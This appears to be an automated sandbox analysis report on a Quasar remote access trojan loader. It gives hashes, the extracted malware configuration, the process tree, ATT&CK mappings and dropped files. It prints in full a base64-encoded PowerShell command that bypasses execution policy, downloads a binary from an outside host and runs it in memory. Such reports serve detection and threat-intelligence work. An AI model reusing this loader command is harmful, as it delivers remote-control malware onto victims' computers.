quasar | 2e1e7479498f263156ce8f1a4d5760cf35a28f3e102b652e2dcc15ce60cdaf89

Analysis

max time kernel
12s
max time network
16s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
29-06-2024 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.bat
Size

2KB
MD5

337cfcf36634c573c615b9d86ac21a8b
SHA1

c840474cd8f10bfa82165f21f97359ac29cb06fb
SHA256

2e1e7479498f263156ce8f1a4d5760cf35a28f3e102b652e2dcc15ce60cdaf89
SHA512

3c454364f5841bc6c87a96f70179620a717e8baeec83ce3e7f04d46be1d65c84281c5a634c136585a3b33e0321c515559961482a33cdcdf0fbee7a539f7b4a01

Score

10^/10

quasar office04 execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

127.0.0.1:4782

Mutex

b04ba2ce-b74d-409a-9f5c-bdaffe1644ec

Attributes

encryption_key
3C410D3A0BD1E76F9F4B11AD742F61FAE2E183E6
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar payload 1 IoCs

Processes:

resource yara_rule

behavioral1/memory/2280-29-0x00000289BEBF0000-0x00000289BEF14000-memory.dmp family_quasar
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 2280 powershell.exe
4 2280 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2280 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2280 powershell.exe
2280 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2280 powershell.exe
Token: SeDebugPrivilege 2280 powershell.exe

resource	yara_rule
behavioral1/memory/2280-29-0x00000289BEBF0000-0x00000289BEF14000-memory.dmp	family_quasar

flow	pid	process
2	2280	powershell.exe
4	2280	powershell.exe

pid	process
2280	powershell.exe

pid	process
2280	powershell.exe
2280	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.execsc.exe

description	pid	process	target process
PID 4048 wrote to memory of 2280	4048	cmd.exe	powershell.exe
PID 4048 wrote to memory of 2280	4048	cmd.exe	powershell.exe
PID 2280 wrote to memory of 3364	2280	powershell.exe	csc.exe
PID 2280 wrote to memory of 3364	2280	powershell.exe	csc.exe
PID 3364 wrote to memory of 4684	3364	csc.exe	cvtres.exe
PID 3364 wrote to memory of 4684	3364	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy bypass -e IAAgACQAawBlAG0AYQB0AGkAYQBuAHQAaABlAGcAcgBlAGEAdAAgAD0AIABAACIACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ATgBlAHQAOwAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGsAZQBtAGEAdABpAGEAbgB0AGgAZQBnAHIAZQBhAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABhAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAGwAbABvAGMAVAB5AHAAZQAsACAAdQBpAG4AdAAgAG0AbwBkAGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAFsAVQBuAG0AYQBuAGEAZwBlAGQARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKABDAGEAbABsAGkAbgBnAEMAbwBuAHYAZQBuAHQAaQBvAG4ALgBTAHQAZABDAGEAbABsACkAXQAKACAAIAAgACAAIAAgACAAIABkAGUAbABlAGcAYQB0AGUAIAB2AG8AaQBkACAATQBlAG0ATABvAGEAZABlAHIAKAApADsACgAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAE0AYQBpAG4AKAApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQAuAFQAbABzADEAMgA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwB0AHIAaQBuAGcAIAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBvAHMAaABpAC4AYQB0AC8AeABQAGMAQQAvAEkAdwBuAFEALgBiAGkAbgAiADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHkAdABlAFsAXQAgAGcAbwBsAGEAbgBnAHMAaABjADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAFcAZQBiAEMAbABpAGUAbgB0ACAAYwBsAGkAZQBuAHQAIAA9ACAAbgBlAHcAIABXAGUAYgBDAGwAaQBlAG4AdAAoACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAbwBsAGEAbgBnAHMAaABjACAAPQAgAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAB1AHIAbAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AAoACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAGMAaABhAGkAbgBzAGsAaQAgAD0AIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAQwBvAG4AdgBlAHIAdAAuAFQAbwBVAEkAbgB0ADMAMgAoAGcAbwBsAGEAbgBnAHMAaABjAC4ATABlAG4AZwB0AGgAKQAsACAAMAB4ADEAMAAwADAALAAgADAAeAA0ADAAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAATQBhAHIAcwBoAGEAbAAuAEMAbwBwAHkAKABnAG8AbABhAG4AZwBzAGgAYwAsACAAMAB4ADAALAAgAGMAaABhAGkAbgBzAGsAaQAsACAAZwBvAGwAYQBuAGcAcwBoAGMALgBMAGUAbgBnAHQAaAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABNAGUAbQBMAG8AYQBkAGUAcgAgAGsAZABvAHQAIAA9ACAATQBhAHIAcwBoAGEAbAAuAEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgA8AE0AZQBtAEwAbwBhAGQAZQByAD4AKABjAGgAYQBpAG4AcwBrAGkAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAawBkAG8AdAAoACkAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoAIAAgACAAIABBAGQAZAAtAFQAeQBwAGUAIAAkAGsAZQBtAGEAdABpAGEAbgB0AGgAZQBnAHIAZQBhAHQACgAgACAAIAAgAFsAawBlAG0AYQB0AGkAYQBuAHQAaABlAGcAcgBlAGEAdABdADoAOgBNAGEAaQBuACgAKQA=
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uce14qca\uce14qca.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES538E.tmp" "c:\Users\Admin\AppData\Local\Temp\uce14qca\CSC17C445BF4C8448DFA12CFF5DD299B4A3.TMP"
4⤵
PID:4684

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES538E.tmp
Filesize
1KB

MD5
a8dc9ce3efcf452d48f890f6b5ffef0f

SHA1
ea5f42cbfb36c93e3a0f08905b4d25fdcfa59655

SHA256
c80423af51e917cd7ea1e35fc81936cb4f537d0ae5defa86816577f3385acfe4

SHA512
65fccc9b6964e6bfbbaa6efb5b977512c826a1b5ad4bdc6866f59c497b3c50eeb900fe0ddcd148aa13b9f2899c2743a84dd2af61495ef6ca309ec4bc6d51dab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgeuuij0.uo2.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\uce14qca\uce14qca.dll
Filesize
4KB

MD5
d7bed58be5f89a61a11a099fd1a1e556

SHA1
5fd2dd3a42858b4c450c37a6d3de282d4e834954

SHA256
64fc4f8052dc1ccafd827aaa78ebd711f84692f7ae00216c3978e0d8063c8904

SHA512
a02f241bfe14137ce7557d81af02765b322902a84e991b534409195a83f6272e9bbb7252c0b6aa19fdd7fe590f153b89fc91d45467bedb6fee180459eef93f18

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uce14qca\CSC17C445BF4C8448DFA12CFF5DD299B4A3.TMP
Filesize
652B

MD5
8ad9807d40c1e5dbb99e0bb0b64fa4c2

SHA1
7ebb8596dd3769ea902b126fdb58625a373ea37b

SHA256
1e92d5f9b1c02f48395c922131a5f86f7be1df50ec45d0af18f3234c80727045

SHA512
5227a6eb569faacec1b9218325ce9bce78307597b6f982df0989984b1b8b8bea46449f2ffc4ea79619f87b2957e3176412c678ba1e5a49d86cbe758b12385ae3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uce14qca\uce14qca.0.cs
Filesize
985B

MD5
4d54a51f986cb907de361385c87eea24

SHA1
9b47fc97a564d377d055079a9bd4b7d9b0bd6231

SHA256
be7b22d7c0279edab52002583ca92f086c4184acd1aeb80a520255fce726bfa8

SHA512
6d390b95e712c71a08d37f670db85f2ba2519dba03e8c0c5f843889a9e3d19c13bf7ac241a1dd4d8dc78d976530fec29a0f706445dae3d1777309dc5bb528d87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uce14qca\uce14qca.cmdline
Filesize
369B

MD5
2e842fc51a46204e5e9e08c1639a72e3

SHA1
830c4862345afc4ee35935e90175dd8dc4a59e4a

SHA256
164f0870b723da751d3211a14e98fe683bbfa9ea8f51f49fff8e407429effbfd

SHA512
399e3d112bbfae3b94b90bf962a45bb165303a58c359df3bb3339f5fa34b177194326ed951dd33bd6cec9067bd59f3bdce62fe314569ce8f7bb2b55f231fda09

Download Submit
memory/2280-25-0x00000289A5170000-0x00000289A5178000-memory.dmp

Filesize
32KB

Download
memory/2280-28-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

Filesize
8KB

Download
memory/2280-9-0x00000289BD6E0000-0x00000289BD702000-memory.dmp

Filesize
136KB

Download
memory/2280-27-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-12-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-29-0x00000289BEBF0000-0x00000289BEF14000-memory.dmp

Filesize
3.1MB

Download
memory/2280-30-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-31-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-32-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

Filesize
10.8MB

Download
memory/2280-33-0x00000289BE5C0000-0x00000289BE610000-memory.dmp

Filesize
320KB

Download
memory/2280-34-0x00000289BE6E0000-0x00000289BE792000-memory.dmp

Filesize
712KB

Download